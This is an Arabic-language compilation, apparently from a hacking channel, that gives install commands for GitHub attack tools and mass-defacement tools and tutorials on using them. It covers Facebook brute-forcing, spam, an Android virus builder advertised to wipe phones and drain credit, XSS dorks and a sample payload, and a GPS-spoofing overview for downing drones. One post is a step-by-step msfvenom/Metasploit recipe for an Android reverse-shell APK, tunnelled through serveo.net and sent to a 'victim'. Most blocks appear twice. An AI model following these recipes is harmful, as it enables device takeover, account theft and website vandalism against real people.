ادوات ستخراج لوحات الادمن
https://github.com/the-c0d3r/admin-finder
https://github.com/bdblackhat/admin-panel-finder
https://github.com/MonroCoury/admin-panel-finder
https://github.com/the-c0d3r/admin-finder
https://github.com/bdblackhat/admin-panel-finder
https://github.com/MonroCoury/admin-panel-finder
GitHub
GitHub - the-c0d3r/admin-finder: Blazing fast admin panel finder with asyncio and aiohttp
Blazing fast admin panel finder with asyncio and aiohttp - the-c0d3r/admin-finder
2 - اداه LITESPAM
يحتوي على أدوات مرسلي الرسائل غير المرغوب فيها بأنواع مختلفة ذات حدود عالية حتى غير محدودة وغير مبنية على جميع مساهمات المبرمجين لجمع أدواته هنا ، مع البريد العشوائي
اوامر تثبيتها
$ pkg update upgrade
$ pkg install git
$ pkg install python2
$ pkg install toilet
$ pkg install figlet
$ pkg install php
$ pkg install sh
$ git clone https://github.com/4L13199/LITESPAM
$ cd LITESPAM
sh LITESPAM.sh
#CS
يحتوي على أدوات مرسلي الرسائل غير المرغوب فيها بأنواع مختلفة ذات حدود عالية حتى غير محدودة وغير مبنية على جميع مساهمات المبرمجين لجمع أدواته هنا ، مع البريد العشوائي
اوامر تثبيتها
$ pkg update upgrade
$ pkg install git
$ pkg install python2
$ pkg install toilet
$ pkg install figlet
$ pkg install php
$ pkg install sh
$ git clone https://github.com/4L13199/LITESPAM
$ cd LITESPAM
sh LITESPAM.sh
#CS
GitHub
GitHub - 4L13199/LITESPAM: Berisi Tools Spammer Dengan Berbagai Macam jenis Dengan Limit Tinggi Bahkan Unlimited
Berisi Tools Spammer Dengan Berbagai Macam jenis Dengan Limit Tinggi Bahkan Unlimited - 4L13199/LITESPAM
4- اداه wpseku
مميزاتها
و هي مقصود بها اداه Wordpress Security Scanner و هي
يتم الآن إنشاء إصدار جديد ... WPSeku هو ماسح عدم حصانة WordPress للمربع الأسود والذي يمكن استخدامه لمسح تثبيتات WordPress عن بُعد للعثور على مشكلات الأمان وبطالع لك الثغرات الموجودة بالموقع
اوامر تثبيتها
$ git clone https://github.com/m4ll0k/WPSeku.git wpseku
$ cd wpseku
$ pip3 install -r requirements.txt
$ python3 wpseku.py
#CS
مميزاتها
و هي مقصود بها اداه Wordpress Security Scanner و هي
يتم الآن إنشاء إصدار جديد ... WPSeku هو ماسح عدم حصانة WordPress للمربع الأسود والذي يمكن استخدامه لمسح تثبيتات WordPress عن بُعد للعثور على مشكلات الأمان وبطالع لك الثغرات الموجودة بالموقع
اوامر تثبيتها
$ git clone https://github.com/m4ll0k/WPSeku.git wpseku
$ cd wpseku
$ pip3 install -r requirements.txt
$ python3 wpseku.py
#CS
7- اداه portwitness
تم تصميم PortWitness كأداة للكشف عن النطاقات النشطة والمجالات الفرعية لمواقع الويب التي تستخدم ميزة فحص المنافذ. يساعد اختبار الاختراق وصائدي الأخطاء في جمع وجمع المعلومات حول النطاقات الفرعية النشطة للمجال الذي يستهدفونه. يقوم PortWitness بتعداد النطاقات الفرعية باستخدام Sublist3r ويستخدم Nmap مع nslookup للبحث عن المواقع النشطة. أخيرًا ، يتم تخزين المجال أو النطاقات الفرعية النشطة في ملف إخراج باستخدام ملف الإخراج هذا ، يمكن للمستخدم بدء اختبار هذه المواقع مباشرة. تم دمج Sublist3r أيضًا مع هذه الوحدة. إنه فعال للغاية ودقيق عندما يتعلق الأمر بمعرفة النطاقات الفرعية النشطة باستخدام Nmap و nslookup. تساعد هذه الأداة أيضًا المستخدم في الحصول على عناوين IP لجميع النطاقات الفرعية والمخازن ، ثم في ملف نصي ، يمكن استخدام عناوين IP هذه لإجراء مزيد من المسح للهدف.
اوامر تثبيتها
git clone https://github.com/viperbluff/PortWitness.git
chmod +x portwitness.sh
bash portwitness.sh الرابط
#CS
تم تصميم PortWitness كأداة للكشف عن النطاقات النشطة والمجالات الفرعية لمواقع الويب التي تستخدم ميزة فحص المنافذ. يساعد اختبار الاختراق وصائدي الأخطاء في جمع وجمع المعلومات حول النطاقات الفرعية النشطة للمجال الذي يستهدفونه. يقوم PortWitness بتعداد النطاقات الفرعية باستخدام Sublist3r ويستخدم Nmap مع nslookup للبحث عن المواقع النشطة. أخيرًا ، يتم تخزين المجال أو النطاقات الفرعية النشطة في ملف إخراج باستخدام ملف الإخراج هذا ، يمكن للمستخدم بدء اختبار هذه المواقع مباشرة. تم دمج Sublist3r أيضًا مع هذه الوحدة. إنه فعال للغاية ودقيق عندما يتعلق الأمر بمعرفة النطاقات الفرعية النشطة باستخدام Nmap و nslookup. تساعد هذه الأداة أيضًا المستخدم في الحصول على عناوين IP لجميع النطاقات الفرعية والمخازن ، ثم في ملف نصي ، يمكن استخدام عناوين IP هذه لإجراء مزيد من المسح للهدف.
اوامر تثبيتها
git clone https://github.com/viperbluff/PortWitness.git
chmod +x portwitness.sh
bash portwitness.sh الرابط
#CS
GitHub
GitHub - viperbluff/PortWitness: Tool for checking Whether a domain or its multiple sub-domains are up and running.
Tool for checking Whether a domain or its multiple sub-domains are up and running. - viperbluff/PortWitness
3- اداة trape
git clone https://github.com/jofpin/trape.git
cd trape
python2 -m pip install -r requirements.txt
عرض المميزات
python2 trape.py -h
وظيفتها اداة Trape
هي أداة تحليل وبحث OSIN ، والتي تتيح للناس تتبع وتنفيذ هجمات الهندسة الاجتماعية الذكية في الوقت الحقيقي. تم إنشاؤه بهدف تعليم العالم كيف يمكن لشركات الإنترنت الكبيرة الحصول على معلومات سرية مثل حالة جلسات مواقعها الإلكترونية أو خدماتها والتحكم في مستخدميها من خلال متصفحهم ، دون علمهم ، ولكنه يتطور بهدف مساعدة الحكومة المنظمات والشركات والباحثين لتتبع مجرمي الإنترنت.
طريقه عملها
python2 trape.py --url http://example.com --port 8080
#CS
git clone https://github.com/jofpin/trape.git
cd trape
python2 -m pip install -r requirements.txt
عرض المميزات
python2 trape.py -h
وظيفتها اداة Trape
هي أداة تحليل وبحث OSIN ، والتي تتيح للناس تتبع وتنفيذ هجمات الهندسة الاجتماعية الذكية في الوقت الحقيقي. تم إنشاؤه بهدف تعليم العالم كيف يمكن لشركات الإنترنت الكبيرة الحصول على معلومات سرية مثل حالة جلسات مواقعها الإلكترونية أو خدماتها والتحكم في مستخدميها من خلال متصفحهم ، دون علمهم ، ولكنه يتطور بهدف مساعدة الحكومة المنظمات والشركات والباحثين لتتبع مجرمي الإنترنت.
طريقه عملها
python2 trape.py --url http://example.com --port 8080
#CS
GitHub
GitHub - jofpin/trape: People tracker on the Internet: OSINT analysis and research tool by Jose Pino
People tracker on the Internet: OSINT analysis and research tool by Jose Pino - jofpin/trape
4- اداة Firecrack
تثبيتها علي termux
pkg install python2
pkg install git
git clone https://github.com/Ranginang67/Firecrack
cd Firecrack
pip2 install -r requirements.txt
python2 firecrack.py
help
تثبيتها علي كالي
apt-get install python
apt-get install python-pip
apt-get install git
git clone https://github.com/Ranginang67/Firecrack
cd Firecrack
pip install -r requirements.txt
python firecrack.py
help
مميزات الاداة
1.hack facebook (random attack)
2.bruteforce facebook (one account)
3.admin finder
4.bing dorking
5.deface (file upload)
#CS
تثبيتها علي termux
pkg install python2
pkg install git
git clone https://github.com/Ranginang67/Firecrack
cd Firecrack
pip2 install -r requirements.txt
python2 firecrack.py
help
تثبيتها علي كالي
apt-get install python
apt-get install python-pip
apt-get install git
git clone https://github.com/Ranginang67/Firecrack
cd Firecrack
pip install -r requirements.txt
python firecrack.py
help
مميزات الاداة
1.hack facebook (random attack)
2.bruteforce facebook (one account)
3.admin finder
4.bing dorking
5.deface (file upload)
#CS
GitHub
GitHub - Ranginang67/Firecrack: :fire: Firecrack pentest tools: Facebook hacking random attack, deface, admin finder, bing dorking:
:fire: Firecrack pentest tools: Facebook hacking random attack, deface, admin finder, bing dorking: - Ranginang67/Firecrack
5- AOXdeface اداة
هي أداة لتشويه عشرات أو مئات المواقع في وقت واحد ، وهذا يتوقف على عدد المواقع التي حددتها بواسطتك ، وهذا ليس بالأمر الخطير ، وهذه ليست سوى طريقة تحميل الملفات إندونيسيا
طريقه تثبيتها علي
Termux
pkg install python2
pip2 install requests
pkg install git
git clone https://github.com/Ranginang67/AOXdeface
cd AOXdeface
python2 aox.py
طريقه تثبيتها علي
Linux:
apt-get install python
apt-get install pthon-pip
pip install requests
apt-get install git
git clone https://github.com/Ranginang67/AOXdeface
cd AOXdeface
python aox.py
#CS
هي أداة لتشويه عشرات أو مئات المواقع في وقت واحد ، وهذا يتوقف على عدد المواقع التي حددتها بواسطتك ، وهذا ليس بالأمر الخطير ، وهذه ليست سوى طريقة تحميل الملفات إندونيسيا
طريقه تثبيتها علي
Termux
pkg install python2
pip2 install requests
pkg install git
git clone https://github.com/Ranginang67/AOXdeface
cd AOXdeface
python2 aox.py
طريقه تثبيتها علي
Linux:
apt-get install python
apt-get install pthon-pip
pip install requests
apt-get install git
git clone https://github.com/Ranginang67/AOXdeface
cd AOXdeface
python aox.py
#CS
GitHub
GitHub - Ranginang67/AOXdeface: AOXdeface automatic deface many websites at once
AOXdeface automatic deface many websites at once. Contribute to Ranginang67/AOXdeface development by creating an account on GitHub.
2- اداة CMSeeK
git clone https://github.com/Tuhinshubhra/CMSeeK
cd CMSeeK
pip/pip3 install -r requirements.txt
python3 cmseek.py
مثال
python3 cmseek.py -u [الرابط]
الاداة دي بالجد رائعه
مهمه في حاله الموقع WordPress
بتعمل ليك scan و بتعطيك نوع الثغرة الموجودة به
كما في الصورة ب الاسفل ..
ولها العديد من المميزات
#CS
git clone https://github.com/Tuhinshubhra/CMSeeK
cd CMSeeK
pip/pip3 install -r requirements.txt
python3 cmseek.py
مثال
python3 cmseek.py -u [الرابط]
الاداة دي بالجد رائعه
مهمه في حاله الموقع WordPress
بتعمل ليك scan و بتعطيك نوع الثغرة الموجودة به
كما في الصورة ب الاسفل ..
ولها العديد من المميزات
#CS
GitHub
GitHub - Tuhinshubhra/CMSeeK: CMS Detection and Exploitation suite - Scan WordPress, Joomla, Drupal and over 180 other CMSs
CMS Detection and Exploitation suite - Scan WordPress, Joomla, Drupal and over 180 other CMSs - Tuhinshubhra/CMSeeK
6- اداة
ملحوظه الاداة تعمل علي
kali, ubuntu, and parrot
طريقه تثبيتها
apt-get install git
git clone https://github.com/Ranginang67/Crypton
chmod 777 install.sh
./install.sh
crypton
مميزاتها
credit card validator checker to check whether the credit card is active
Facebook account information to see all the information on your Facebook account
social media name checker search for social media users associated with that username
website backdoor scanner looking for a backdoor shell that is embedded on the website
http header information get http header information from website
website analyze scanner scanning website vulnerability
find admin login page for find the admin login page
gmail account checker checking if gmail account is exists
find my facebook id find facebook user id
dump all friend id dump all your friend ID on Facebook
domain age checker checking age of domain
md5 hash cracker crack md5 password
ip address checker search for information from the ip
#CS
ملحوظه الاداة تعمل علي
kali, ubuntu, and parrot
طريقه تثبيتها
apt-get install git
git clone https://github.com/Ranginang67/Crypton
chmod 777 install.sh
./install.sh
crypton
مميزاتها
credit card validator checker to check whether the credit card is active
Facebook account information to see all the information on your Facebook account
social media name checker search for social media users associated with that username
website backdoor scanner looking for a backdoor shell that is embedded on the website
http header information get http header information from website
website analyze scanner scanning website vulnerability
find admin login page for find the admin login page
gmail account checker checking if gmail account is exists
find my facebook id find facebook user id
dump all friend id dump all your friend ID on Facebook
domain age checker checking age of domain
md5 hash cracker crack md5 password
ip address checker search for information from the ip
#CS
GitHub
GitHub - Ranginang67/Crypton: :mag: Crypton: linux Pentester tools, penetration testing and ethical hacking
:mag: Crypton: linux Pentester tools, penetration testing and ethical hacking - Ranginang67/Crypton
2- اداة Cr3dOv3r
git clone https://github.com/D4Vinci/Cr3dOv3r.git
cd Cr3dOv3r
python3 -m pip install -r requirements.txt
python3 Cr3d0v3r.py -h
#ملحوظه استخدمو python او python3
مهمه الاداة تعمل فحص ل الاميل اذا كان مرتبط ب حسابات اخري او لا
مثلا اذا كان مرتبط ب facebook او تويتر و غيرها
وله العديد من المميزات الاخري
#CS
git clone https://github.com/D4Vinci/Cr3dOv3r.git
cd Cr3dOv3r
python3 -m pip install -r requirements.txt
python3 Cr3d0v3r.py -h
#ملحوظه استخدمو python او python3
مهمه الاداة تعمل فحص ل الاميل اذا كان مرتبط ب حسابات اخري او لا
مثلا اذا كان مرتبط ب facebook او تويتر و غيرها
وله العديد من المميزات الاخري
#CS
GitHub
GitHub - D4Vinci/Cr3dOv3r: Know the dangers of credential reuse attacks.
Know the dangers of credential reuse attacks. Contribute to D4Vinci/Cr3dOv3r development by creating an account on GitHub.
inurl:".php?cmd="
inurl:".php?z="
inurl:".php?q="
inurl:".php?search="
inurl:".php?query="
inurl:".php?searchstring="
inurl:".php?keyword="
inurl:".php?file="
inurl:".php?years="
inurl:".php?txt="
inurl:".php?tag="
inurl:".php?max="
inurl:".php?from="
inurl:".php?author="
inurl:".php?pass="
inurl:".php?feedback="
inurl:".php?mail="
inurl:".php?cat="
inurl:".php?vote="
inurl:search.php?q=
inurl:com_feedpostold/feedpost.php?url=
inurl:scrapbook.php?id=
inurl:headersearch.php?sid=
inurl:/poll/default.asp?catid=
inurl:/search_results.php?search=
xp : http://host/php/index.php?lang=[XSS]
POP: http://host/php/index.php?lang=<center><h1>XSS BL4CKH4T G4N3$H GROUP</h1></center>
#CS
inurl:".php?z="
inurl:".php?q="
inurl:".php?search="
inurl:".php?query="
inurl:".php?searchstring="
inurl:".php?keyword="
inurl:".php?file="
inurl:".php?years="
inurl:".php?txt="
inurl:".php?tag="
inurl:".php?max="
inurl:".php?from="
inurl:".php?author="
inurl:".php?pass="
inurl:".php?feedback="
inurl:".php?mail="
inurl:".php?cat="
inurl:".php?vote="
inurl:search.php?q=
inurl:com_feedpostold/feedpost.php?url=
inurl:scrapbook.php?id=
inurl:headersearch.php?sid=
inurl:/poll/default.asp?catid=
inurl:/search_results.php?search=
xp : http://host/php/index.php?lang=[XSS]
POP: http://host/php/index.php?lang=<center><h1>XSS BL4CKH4T G4N3$H GROUP</h1></center>
#CS
1 - اداة Clickjacking-Tester
هي اداة حلوة وبسيطه هي بتعمل ليك اسكان للموقع اذا كان مصاب بثغرة او لا
لمجموعه مواقع
اوامر التثبيت
$ apt update && apt upgrade
$ apt install git
$ apt install python2
$ apt install python
$ git clone https://github.com/D4Vinci/Clickjacking-Tester
$ cd Clickjacking-Tester
$ chmod +x *
$ python3 Clickjacking-Tester.py file.txt
ال file.txt هاذي للسته تحتوي مجموعه مواقع
بعدا راح يطلع ل output
#CS
هي اداة حلوة وبسيطه هي بتعمل ليك اسكان للموقع اذا كان مصاب بثغرة او لا
لمجموعه مواقع
اوامر التثبيت
$ apt update && apt upgrade
$ apt install git
$ apt install python2
$ apt install python
$ git clone https://github.com/D4Vinci/Clickjacking-Tester
$ cd Clickjacking-Tester
$ chmod +x *
$ python3 Clickjacking-Tester.py file.txt
ال file.txt هاذي للسته تحتوي مجموعه مواقع
بعدا راح يطلع ل output
#CS
GitHub
GitHub - D4Vinci/Clickjacking-Tester: A python script designed to check if the website if vulnerable of clickjacking and create…
A python script designed to check if the website if vulnerable of clickjacking and create a poc - D4Vinci/Clickjacking-Tester
5- اداة
AndroBugs Framework
هو نظام لتحليل الثغرات الأمنية في Android يساعد المطورين أو المتسللين على إيجاد ثغرات أمنية محتملة في تطبيقات Android. لا واجهة واجهة المستخدم الرسومية الرائعة ، ولكن الأكثر كفاءة (أقل من دقيقتين لكل مسح في المتوسط) وأكثر دقة.
طريقه تبيتها
$ apt install git
$ apt install python2
$ apt install python
$ git clone https://github.com/AndroBugs/AndroBugs_Framework
$ python androbugs.py -f [APK file]
معرفه طريقه عملهاا
python androbugs.py -h
#CS
AndroBugs Framework
هو نظام لتحليل الثغرات الأمنية في Android يساعد المطورين أو المتسللين على إيجاد ثغرات أمنية محتملة في تطبيقات Android. لا واجهة واجهة المستخدم الرسومية الرائعة ، ولكن الأكثر كفاءة (أقل من دقيقتين لكل مسح في المتوسط) وأكثر دقة.
طريقه تبيتها
$ apt install git
$ apt install python2
$ apt install python
$ git clone https://github.com/AndroBugs/AndroBugs_Framework
$ python androbugs.py -f [APK file]
معرفه طريقه عملهاا
python androbugs.py -h
#CS
GitHub
GitHub - AndroBugs/AndroBugs_Framework: AndroBugs Framework is an efficient Android vulnerability scanner that helps developers…
AndroBugs Framework is an efficient Android vulnerability scanner that helps developers or hackers find potential security vulnerabilities in Android applications. No need to install on Windows. - ...
اقدم لكم اداة || VirusCrafter || اداه جديده وقويه لصنع تطبيقات الفيروس على شكل برامج اندرويد هذه الفيروسات خطيره انتبهوا بعد القيام بصناعتها تثبيتها بجهازكم الاندرويد منها فورمات ومنها حرق المعالج ومنها سحب رصيد الجوال
( 18 ) فيروس APK بالاداه
$ pkg install python2
$ pkg install wget
$ pkg install figlet
$ gem install lolcat
$ git clone https://github.com/herp1337/VirusCrafter.git
$ cd VirusCrafter
$ python2 ViruzCrafter.py
📋 ملاحظه مهمه :
بعد الانتهاء من صنع الفيروس توجه الى ملفاتي بجهازك sdcard وراح تلاقي تطبيق الفيروس هناك .. الاداه لاتحتاج نقل الفيروس من termux الى sdcard ( ملفاتي ) يتم نقلها اوتوماتيكيا الى sdcard
#CS
( 18 ) فيروس APK بالاداه
$ pkg install python2
$ pkg install wget
$ pkg install figlet
$ gem install lolcat
$ git clone https://github.com/herp1337/VirusCrafter.git
$ cd VirusCrafter
$ python2 ViruzCrafter.py
📋 ملاحظه مهمه :
بعد الانتهاء من صنع الفيروس توجه الى ملفاتي بجهازك sdcard وراح تلاقي تطبيق الفيروس هناك .. الاداه لاتحتاج نقل الفيروس من termux الى sdcard ( ملفاتي ) يتم نقلها اوتوماتيكيا الى sdcard
#CS
GitHub
GitHub - herp1337/VirusCrafter: make apk virus you want
make apk virus you want. Contribute to herp1337/VirusCrafter development by creating an account on GitHub.
السلام عليكم ورحمة الله وبركاته
1- pkg install openssh
2 - ssh -R (Desired_Port):localhost:(Desired_Port) serveo.net
صفحه جديدة تكتب أوامر الميتا
و نكتب اوامر عمل البايلود
اولا :
cd metasploit-framework
(ملحوظه :: هذي إذا كانت الملف تبع الميتا مظهر تكتب الأمر السابق )
و بعدها
msfvenom -p android/meterpreter/reverse_tcp LHOST=serveo.net LPORT=4564 R > storage/downloads/CS.apk
ثانيا نفتح اداة الميتاسبلويت بالامر
./msfconsole
ثالثا بعد الدخول علي الميتاسبلويت نكتب الاوامر
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 127.0.0.1
set lport 4444
exploit
قم بإرسال ارساله للضحية
و بعدها يصلك تبليغ وتفتح الجلسه عندك
أوامر التحكم تكتب help أو ?
#CS
1- pkg install openssh
2 - ssh -R (Desired_Port):localhost:(Desired_Port) serveo.net
صفحه جديدة تكتب أوامر الميتا
و نكتب اوامر عمل البايلود
اولا :
cd metasploit-framework
(ملحوظه :: هذي إذا كانت الملف تبع الميتا مظهر تكتب الأمر السابق )
و بعدها
msfvenom -p android/meterpreter/reverse_tcp LHOST=serveo.net LPORT=4564 R > storage/downloads/CS.apk
ثانيا نفتح اداة الميتاسبلويت بالامر
./msfconsole
ثالثا بعد الدخول علي الميتاسبلويت نكتب الاوامر
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 127.0.0.1
set lport 4444
exploit
قم بإرسال ارساله للضحية
و بعدها يصلك تبليغ وتفتح الجلسه عندك
أوامر التحكم تكتب help أو ?
#CS
السلام عليكم
اليوم كما وعدناكم شرح مفصل عن اختراق الطائرات بدون طيار
تتميز الطائرة بدون طيار بميزات تجعلها تتفوق على غيرها من وسائل الطيران الاخرى
فأهم امر هو تقنية الارسال اللحظية وعدم التعرض للمخاطر البشرية ولكن كل شيء وله سلاح ذو حدين
فاذا تم اسقاطها او الحصول عليها فهذا يعني بنسبة كبيرة بناء نظام مشابه لها عن طريق الهندسة العكسية
أبرز عمليات اسقاط طائرات الاستطلاع
اسقاط كتائب القسام طائرة
skylark1
اسقاطر طائرة الاستطلاع الامريكية عن طريق الجيش الالكتروني الايراني
RQ170
اسقاط كتائب القسام لطائرة
skylite B
اولا: كيف تعمل الطائرة بدون طيار ؟
الطائرات بدون طيار تعمل على قاعدة الكترونية متنقلة او ثابتة وذلك حسب مواصفات الطائرة ان كانت حاملة لصواريخ او لاغراض تجسسية
وحسب خبرتي المتواضعه
القواعد الثابتة :تكون للطائرات الثقيلة الحاملة للصواريخ
القواعد المتنقلة: جهاز صغير يتحكم به عن بعد ويمكن وضعه في حقيبة صغيرة كطائرة الاستطلاع سكاي لايت
ولكن هناك بعض الطائرات الثقيلة التي لا تحمل صواريخ او قاذف مثل
RQ170
يعتمد هذا النوع على انتشار الامواج الكهرومغناطيسية بشكل كبير وذلك لضمان زيادة مدى جمع المعلومات
طائرات الاستطلاع المتوسطة تستطيع التحليق على ارتفاع 50.000 قدم .
ويمكن التحكم بها من خلال قاعدة مركزيه حيث يمكنها تزويد المتحكم بالمعلومات الحيًة التي تقع تحت الطائرة مباشرة
ثانيا :كيف يتم اتصال طائرة الاستطلاع بالقاعدة الالكترونية
يتم اتصال الطائرة بالقاعدة الالكترونية عن طريق وضعين
1- الوضع الأول Ground command Station
هذا الوضع يتم التحكم به عن طريق القاعدة المباشرة التي يشرف عليها المهندس الاختصاصي في القاعدة العسكرية وعن طريقه يمكن ارسال الأوامر واستقبالها براحة تامة
2- الوضع الثاني ALR – Automatic Launch and recovery
هذا الوضع مبرمج آليا على الذهاب والاياب لاماكن متعددة في ساعات معينة
كأن تبرمجه على الذهاب في الساعه 6 صباحا لمكان معين والعودة في الساعه 10 على مكان معين وترك الطائرة بدون التحكم بها عن طريق القاعدة الالكترونية
ولكن كيف يتم اختراق طائرات الاستطلاع ؟
في حقيقة الامر اغلب التقنيين والمهندسين يعتقدون ان ذلك يتم عن طريق الهندسة العكسية ولكن ليس هذا حقيقة الامر
ولكن هذا لا ينكر انه ممكن ان يتم عن طريق الهندسة العكسية فهي كفكرة قائمة ولكن ما يصعب الامر حقيقة فك تشفير قنوات الاتصال بين ارسال الطائرة والقاعدة
في جميع حالات اسقاط الطائرات من دون طيار تمت عن طريق ما يسمى
GPS spoofing
ما هو هجوم GPS spoofing؟
في بداية الامر لنجاح اسقاط الطائرة بدون طيار يتوجب قطع الاتصال بين الطائرة والقاعدة لضمان عدم تحكمها بالقاعدة سواء ثابتة او متحركة
يتم قطع الاتصال عن طريق جهاز
SNG(Satellite News Gathering)
هذا جهاز عبارة عن جهاز مرسل وهو متوفر وغالبا ما يستخدم في القرى النائية للبث
يمكننا استخدام هذا الجهاز بتوليد اشارات بنفس الترددات بطاقة اعلى من الاشارة العادية مما يسبب التشويش وبالتالي قطع الاتصال
وهنا يأتي الدور الجوهري في تلخيص الاسقاط
كما تحدثنا مسبقا في اوضاع الاتصال بالقاعدة الالكترونية فان الطائرة مبرمجة لان تهبط في قاعدتها المخصصة ولو تم قطع الاتصال عنها فهي مبرمجة على شيء مسبق
هنا يجب علينا استخدام GPS spoofing
لكل طائرة احداثيات للهبوط
X.Y
X.Y=5.6
فهجوم ال SPOOFING
عبارة عن تضليل في الترجمة
GPS spoofing
يتم الهجوم على طائرة الاستطلاع وتغير الاحداثيات
X.Y=5.6 Chang To x.Y=12.7
ويتم اسقاطها حسب مكان احداثيات جهاز الملاحة وبذلك تصبح الطائرة في ارض المهاجم:) ( اي يتم اسقاطها ) .
اختراق الطائرات بدون طيار
اليوم كما وعدناكم شرح مفصل عن اختراق الطائرات بدون طيار
تتميز الطائرة بدون طيار بميزات تجعلها تتفوق على غيرها من وسائل الطيران الاخرى
فأهم امر هو تقنية الارسال اللحظية وعدم التعرض للمخاطر البشرية ولكن كل شيء وله سلاح ذو حدين
فاذا تم اسقاطها او الحصول عليها فهذا يعني بنسبة كبيرة بناء نظام مشابه لها عن طريق الهندسة العكسية
أبرز عمليات اسقاط طائرات الاستطلاع
اسقاط كتائب القسام طائرة
skylark1
اسقاطر طائرة الاستطلاع الامريكية عن طريق الجيش الالكتروني الايراني
RQ170
اسقاط كتائب القسام لطائرة
skylite B
اولا: كيف تعمل الطائرة بدون طيار ؟
الطائرات بدون طيار تعمل على قاعدة الكترونية متنقلة او ثابتة وذلك حسب مواصفات الطائرة ان كانت حاملة لصواريخ او لاغراض تجسسية
وحسب خبرتي المتواضعه
القواعد الثابتة :تكون للطائرات الثقيلة الحاملة للصواريخ
القواعد المتنقلة: جهاز صغير يتحكم به عن بعد ويمكن وضعه في حقيبة صغيرة كطائرة الاستطلاع سكاي لايت
ولكن هناك بعض الطائرات الثقيلة التي لا تحمل صواريخ او قاذف مثل
RQ170
يعتمد هذا النوع على انتشار الامواج الكهرومغناطيسية بشكل كبير وذلك لضمان زيادة مدى جمع المعلومات
طائرات الاستطلاع المتوسطة تستطيع التحليق على ارتفاع 50.000 قدم .
ويمكن التحكم بها من خلال قاعدة مركزيه حيث يمكنها تزويد المتحكم بالمعلومات الحيًة التي تقع تحت الطائرة مباشرة
ثانيا :كيف يتم اتصال طائرة الاستطلاع بالقاعدة الالكترونية
يتم اتصال الطائرة بالقاعدة الالكترونية عن طريق وضعين
1- الوضع الأول Ground command Station
هذا الوضع يتم التحكم به عن طريق القاعدة المباشرة التي يشرف عليها المهندس الاختصاصي في القاعدة العسكرية وعن طريقه يمكن ارسال الأوامر واستقبالها براحة تامة
2- الوضع الثاني ALR – Automatic Launch and recovery
هذا الوضع مبرمج آليا على الذهاب والاياب لاماكن متعددة في ساعات معينة
كأن تبرمجه على الذهاب في الساعه 6 صباحا لمكان معين والعودة في الساعه 10 على مكان معين وترك الطائرة بدون التحكم بها عن طريق القاعدة الالكترونية
ولكن كيف يتم اختراق طائرات الاستطلاع ؟
في حقيقة الامر اغلب التقنيين والمهندسين يعتقدون ان ذلك يتم عن طريق الهندسة العكسية ولكن ليس هذا حقيقة الامر
ولكن هذا لا ينكر انه ممكن ان يتم عن طريق الهندسة العكسية فهي كفكرة قائمة ولكن ما يصعب الامر حقيقة فك تشفير قنوات الاتصال بين ارسال الطائرة والقاعدة
في جميع حالات اسقاط الطائرات من دون طيار تمت عن طريق ما يسمى
GPS spoofing
ما هو هجوم GPS spoofing؟
في بداية الامر لنجاح اسقاط الطائرة بدون طيار يتوجب قطع الاتصال بين الطائرة والقاعدة لضمان عدم تحكمها بالقاعدة سواء ثابتة او متحركة
يتم قطع الاتصال عن طريق جهاز
SNG(Satellite News Gathering)
هذا جهاز عبارة عن جهاز مرسل وهو متوفر وغالبا ما يستخدم في القرى النائية للبث
يمكننا استخدام هذا الجهاز بتوليد اشارات بنفس الترددات بطاقة اعلى من الاشارة العادية مما يسبب التشويش وبالتالي قطع الاتصال
وهنا يأتي الدور الجوهري في تلخيص الاسقاط
كما تحدثنا مسبقا في اوضاع الاتصال بالقاعدة الالكترونية فان الطائرة مبرمجة لان تهبط في قاعدتها المخصصة ولو تم قطع الاتصال عنها فهي مبرمجة على شيء مسبق
هنا يجب علينا استخدام GPS spoofing
لكل طائرة احداثيات للهبوط
X.Y
X.Y=5.6
فهجوم ال SPOOFING
عبارة عن تضليل في الترجمة
GPS spoofing
يتم الهجوم على طائرة الاستطلاع وتغير الاحداثيات
X.Y=5.6 Chang To x.Y=12.7
ويتم اسقاطها حسب مكان احداثيات جهاز الملاحة وبذلك تصبح الطائرة في ارض المهاجم:) ( اي يتم اسقاطها ) .
اختراق الطائرات بدون طيار
11- اداة webkiller
git clone https://github.com/ultrasecurity/webkiller.git
cd webkiller
pip install -r requirements.txt
python webkiller.py
#مميزات_الاداة
1 - Reverse IP With HackTarget
2 - Reverse IP With YouGetSignal
3 - Geo IP Lookup
4 - Whois
5 - Bypass CloudFlare
6 - DNS Lookup
7 - Find Shared DNS
8 - Show HTTP Header
9 - Port Scan
10 - CMS Scan
11 - Page Admin Finder
12 - Robots.txt
13 - Traceroute
14 - Honeypot Detector
15 - Ping
16 - All
17 - Exit
#CS
git clone https://github.com/ultrasecurity/webkiller.git
cd webkiller
pip install -r requirements.txt
python webkiller.py
#مميزات_الاداة
1 - Reverse IP With HackTarget
2 - Reverse IP With YouGetSignal
3 - Geo IP Lookup
4 - Whois
5 - Bypass CloudFlare
6 - DNS Lookup
7 - Find Shared DNS
8 - Show HTTP Header
9 - Port Scan
10 - CMS Scan
11 - Page Admin Finder
12 - Robots.txt
13 - Traceroute
14 - Honeypot Detector
15 - Ping
16 - All
17 - Exit
#CS
GitHub
GitHub - ultrasecurity/webkiller: Tool Information Gathering Write By Python.
Tool Information Gathering Write By Python. Contribute to ultrasecurity/webkiller development by creating an account on GitHub.